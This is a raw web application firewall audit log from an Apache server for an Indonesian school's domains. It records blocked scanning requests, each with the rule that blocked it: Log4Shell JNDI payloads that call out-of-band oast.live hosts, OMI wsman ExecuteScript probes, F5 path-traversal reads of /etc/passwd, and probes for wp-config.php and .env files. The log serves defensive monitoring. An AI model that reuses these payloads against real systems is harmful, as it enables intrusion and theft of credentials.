Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d843c51d-Z-- --3fa8051b-A-- [27/May/2025:11:01:19 +0700] aDU5D2TuEZUBy5rh0saHmgAAABE 103.236.140.4 37174 103.236.140.4 8181 --3fa8051b-B-- POST /wsman HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 1709 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Type: application/soap+xml;charset=UTF-8 X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 70849974 --3fa8051b-C-- HTTP://perpustakaan.smkn22jakarta.sch.id/wsman/ http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript 102400 uuid:00B60932-CC01-0005-0000-000000010000 PT1M30S root/scx aWQ= 0 true --3fa8051b-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --3fa8051b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748318479373169 4307 (- - -) Stopwatch2: 1748318479373169 4307; combined=2931, p1=630, p2=2234, p3=20, p4=22, p5=25, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3fa8051b-Z-- --9d62e711-A-- [27/May/2025:11:39:08 +0700] aDVB7BLFq2VRfSzm6b8bsAAAAJc 103.236.140.4 37694 103.236.140.4 8181 --9d62e711-B-- GET /?x=${jndi:ldap://${:-280}${:-987}.${hostName}.uri.d0qa44pgpeoi1bmoheag8u871rf5un6e4.oast.live/a} HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 166620645 --9d62e711-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9d62e711-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at ARGS:x. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748320748424209 5932 (- - -) Stopwatch2: 1748320748424209 5932; combined=3913, p1=482, p2=3399, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d62e711-Z-- --91984e2f-A-- [27/May/2025:11:39:11 +0700] aDVB7xLFq2VRfSzm6b8bsQAAAJY 103.236.140.4 37694 103.236.140.4 8181 --91984e2f-B-- GET / HTTP/1.1 Referer: ${jndi:ldap://${:-280}${:-987}.${hostName}.referer.d0qa44pgpeoi1bmoheagyk741zt5rh7on.oast.live} Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: ${jndi:ldap://${:-280}${:-987}.${hostName}.useragent.d0qa44pgpeoi1bmoheagu8e9o7ccnja5e.oast.live} Accept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${:-280}${:-987}.${hostName}.accept.d0qa44pgpeoi1bmoheag1c9kt6rcoom3e.oast.live} Accept-Language: ${jndi:ldap://${:-280}${:-987}.${hostName}.acceptlanguage.d0qa44pgpeoi1bmoheagtwg81to9rmi3y.oast.live} Access-Control-Request-Headers: ${jndi:ldap://${:-280}${:-987}.${hostName}.accesscontrolrequestheaders.d0qa44pgpeoi1bmoheag8yw1szfa1n1iw.oast.live} Access-Control-Request-Method: ${jndi:ldap://${:-280}${:-987}.${hostName}.accesscontrolrequestmethod.d0qa44pgpeoi1bmoheags8zqn7djzdat1.oast.live} Authentication: Bearer ${jndi:ldap://${:-280}${:-987}.${hostName}.authenticationbearer.d0qa44pgpeoi1bmoheags147cm56macjw.oast.live} Location: ${jndi:ldap://${:-280}${:-987}.${hostName}.location.d0qa44pgpeoi1bmoheagbcrdjznywuc1k.oast.live} Origin: ${jndi:ldap://${:-280}${:-987}.${hostName}.origin.d0qa44pgpeoi1bmoheagcockby1dsou9h.oast.live} Upgrade-Insecure-Requests: ${jndi:ldap://${:-280}${:-987}.${hostName}.upgradeinsecurerequests.d0qa44pgpeoi1bmoheagne11cdih47bjx.oast.live} X-Api-Version: ${jndi:ldap://${:-280}${:-987}.${hostName}.xapiversion.d0qa44pgpeoi1bmoheagpk4i3s5fj7q7i.oast.live} X-CSRF-Token: ${jndi:ldap://${:-280}${:-987}.${hostName}.xcsrftoken.d0qa44pgpeoi1bmoheagindf69fm6tir9.oast.live} X-Druid-Comment: 
${jndi:ldap://${:-280}${:-987}.${hostName}.xdruidcomment.d0qa44pgpeoi1bmoheagrtf7n8sgifdab.oast.live} X-Origin: ${jndi:ldap://${:-280}${:-987}.${hostName}.xorigin.d0qa44pgpeoi1bmoheagb3453t83a8hqe.oast.live} Cookie: ${jndi:ldap://${:-280}${:-987}.${hostName}.cookiename.d0qa44pgpeoi1bmoheagkne3pm66t9orh.oast.live}=${jndi:ldap://${:-280}${:-987}.${hostName}.cookievalue.d0qa44pgpeoi1bmoheagegutnx931insq.oast.live} X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 166620648 --91984e2f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --91984e2f-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at REQUEST_HEADERS:Referer. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748320751406097 5284 (- - -) Stopwatch2: 1748320751406097 5284; combined=3768, p1=450, p2=3275, p3=0, p4=0, p5=42, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --91984e2f-Z-- --0855ec3d-A-- [27/May/2025:12:20:28 +0700] aDVLnGTuEZUBy5rh0saHvQAAAAk 103.236.140.4 38396 103.236.140.4 8181 --0855ec3d-B-- POST /wsman HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 1709 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Content-Type: application/soap+xml;charset=UTF-8 X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 160587906 --0855ec3d-C-- HTTP://perpustakaan.smkn22jakarta.sch.id/wsman/ http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript 102400 uuid:00B60932-CC01-0005-0000-000000010000 PT1M30S root/scx aWQ= 0 true --0855ec3d-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --0855ec3d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748323228423445 3179 (- - -) Stopwatch2: 1748323228423445 3179; combined=2088, p1=451, p2=1559, p3=20, p4=32, p5=26, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0855ec3d-Z-- --dddb026e-A-- [27/May/2025:12:28:52 +0700] aDVNlFuSH_Spa4YU2Zm0swAAAMI 103.236.140.4 38466 103.236.140.4 8181 --dddb026e-B-- GET /?x=${jndi:ldap://${:-280}${:-987}.${hostName}.uri.d0qa44pgpeoi1bmoheag1rx389fwy84qz.oast.live/a} HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Knoppix; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 164577971 --dddb026e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --dddb026e-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at ARGS:x. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748323732406634 5743 (- - -) Stopwatch2: 1748323732406634 5743; combined=3797, p1=517, p2=3248, p3=0, p4=0, p5=32, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dddb026e-Z-- --f0e6641c-A-- [27/May/2025:12:28:57 +0700] aDVNmVuSH_Spa4YU2Zm0tAAAAMA 103.236.140.4 38466 103.236.140.4 8181 --f0e6641c-B-- GET / HTTP/1.1 Referer: ${jndi:ldap://${:-280}${:-987}.${hostName}.referer.d0qa44pgpeoi1bmoheagb3gm13ynpdjh3.oast.live} Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: ${jndi:ldap://${:-280}${:-987}.${hostName}.useragent.d0qa44pgpeoi1bmoheagxsdkok5qo45by.oast.live} Accept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${:-280}${:-987}.${hostName}.accept.d0qa44pgpeoi1bmoheaguqbjbsp71i413.oast.live} Accept-Language: ${jndi:ldap://${:-280}${:-987}.${hostName}.acceptlanguage.d0qa44pgpeoi1bmoheag4tth6j7ikxcxi.oast.live} Access-Control-Request-Headers: ${jndi:ldap://${:-280}${:-987}.${hostName}.accesscontrolrequestheaders.d0qa44pgpeoi1bmoheagh95qjhcuzhkq8.oast.live} Access-Control-Request-Method: ${jndi:ldap://${:-280}${:-987}.${hostName}.accesscontrolrequestmethod.d0qa44pgpeoi1bmoheagb8hy3y5y4snx5.oast.live} Authentication: Bearer ${jndi:ldap://${:-280}${:-987}.${hostName}.authenticationbearer.d0qa44pgpeoi1bmoheagr6sqsbbfoshwh.oast.live} Location: ${jndi:ldap://${:-280}${:-987}.${hostName}.location.d0qa44pgpeoi1bmoheagpw9wf5npai9mr.oast.live} Origin: ${jndi:ldap://${:-280}${:-987}.${hostName}.origin.d0qa44pgpeoi1bmoheagj7cqco8bizgfd.oast.live} Upgrade-Insecure-Requests: ${jndi:ldap://${:-280}${:-987}.${hostName}.upgradeinsecurerequests.d0qa44pgpeoi1bmoheagh1tqrokfrefrq.oast.live} X-Api-Version: ${jndi:ldap://${:-280}${:-987}.${hostName}.xapiversion.d0qa44pgpeoi1bmoheagpc9h14cejmgma.oast.live} X-CSRF-Token: ${jndi:ldap://${:-280}${:-987}.${hostName}.xcsrftoken.d0qa44pgpeoi1bmoheage3w9f9i1pbqzf.oast.live} X-Druid-Comment: 
${jndi:ldap://${:-280}${:-987}.${hostName}.xdruidcomment.d0qa44pgpeoi1bmoheag7qa4gjmzidfhy.oast.live} X-Origin: ${jndi:ldap://${:-280}${:-987}.${hostName}.xorigin.d0qa44pgpeoi1bmoheagn49wbosg8riy8.oast.live} Cookie: ${jndi:ldap://${:-280}${:-987}.${hostName}.cookiename.d0qa44pgpeoi1bmoheagk8d9zh7nzxdna.oast.live}=${jndi:ldap://${:-280}${:-987}.${hostName}.cookievalue.d0qa44pgpeoi1bmoheagge1w6q1b7c9cc.oast.live} X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 164577974 --f0e6641c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f0e6641c-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at REQUEST_HEADERS:Referer. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748323737404994 5214 (- - -) Stopwatch2: 1748323737404994 5214; combined=3665, p1=457, p2=3177, p3=0, p4=0, p5=30, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0e6641c-Z-- --4d69406c-A-- [27/May/2025:12:55:48 +0700] aDVT5N6cNBpj1JOkpQlZfwAAAEk 103.236.140.4 42258 103.236.140.4 8181 --4d69406c-B-- GET /wp-config.php HTTP/1.1 Referer: www.google.com Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 174.138.19.18 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 174.138.19.18 Accept-Encoding: gzip X-Varnish: 164580217 --4d69406c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4d69406c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748325348315126 724 (- - -) Stopwatch2: 1748325348315126 724; combined=298, p1=265, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d69406c-Z-- --4e321305-A-- [27/May/2025:12:55:48 +0700] aDVT5N6cNBpj1JOkpQlZgAAAAEU 103.236.140.4 42490 103.236.140.4 8181 --4e321305-B-- GET /wp-config.php HTTP/1.1 Referer: www.google.com Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 174.138.19.18 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 174.138.19.18 Accept-Encoding: gzip X-Varnish: 160762815 --4e321305-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4e321305-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748325348338663 661 (- - -) Stopwatch2: 1748325348338663 661; combined=256, p1=223, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e321305-Z-- --9c4ca479-A-- [27/May/2025:12:58:55 +0700] aDVUn2TuEZUBy5rh0saJUQAAAA8 103.236.140.4 42868 103.236.140.4 8181 --9c4ca479-B-- GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 160588017 --9c4ca479-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9c4ca479-E-- --9c4ca479-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748325535880083 1491 (- - -) Stopwatch2: 1748325535880083 1491; combined=459, p1=345, p2=88, p3=0, p4=0, p5=26, sr=79, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c4ca479-Z-- --33c43f1b-A-- [27/May/2025:12:59:00 +0700] aDVUpGTuEZUBy5rh0saJWAAAABM 103.236.140.4 42868 103.236.140.4 8181 --33c43f1b-B-- GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/112.0 Safari/537.36 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168511798 --33c43f1b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --33c43f1b-E-- --33c43f1b-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748325540402677 2596 (- - -) Stopwatch2: 1748325540402677 2596; combined=643, p1=488, p2=118, p3=0, p4=0, p5=37, sr=80, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33c43f1b-Z-- --5c907560-A-- [27/May/2025:13:07:45 +0700] aDVWsVuSH_Spa4YU2Zm1IQAAANA 103.236.140.4 43194 103.236.140.4 8181 --5c907560-B-- GET /.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 170.39.217.236 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 170.39.217.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --5c907560-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c907560-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748326065949055 696 (- - -) Stopwatch2: 1748326065949055 696; combined=284, p1=250, p2=0, p3=0, p4=0, p5=34, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c907560-Z-- --79649d16-A-- [27/May/2025:13:07:46 +0700] aDVWshLFq2VRfSzm6b8czwAAAJY 103.236.140.4 43196 103.236.140.4 8181 --79649d16-B-- GET /app/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 170.39.217.236 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 170.39.217.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --79649d16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --79649d16-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748326066131198 746 (- - -) Stopwatch2: 1748326066131198 746; combined=305, p1=254, p2=0, p3=0, p4=0, p5=50, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --79649d16-Z-- --0c652026-A-- [27/May/2025:13:07:46 +0700] aDVWsluSH_Spa4YU2Zm1IgAAAM4 103.236.140.4 43198 103.236.140.4 8181 --0c652026-B-- GET /.env.bak HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 170.39.217.236 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 170.39.217.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --0c652026-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c652026-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748326066313260 711 (- - -) Stopwatch2: 1748326066313260 711; combined=260, p1=215, p2=0, p3=0, p4=0, p5=45, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
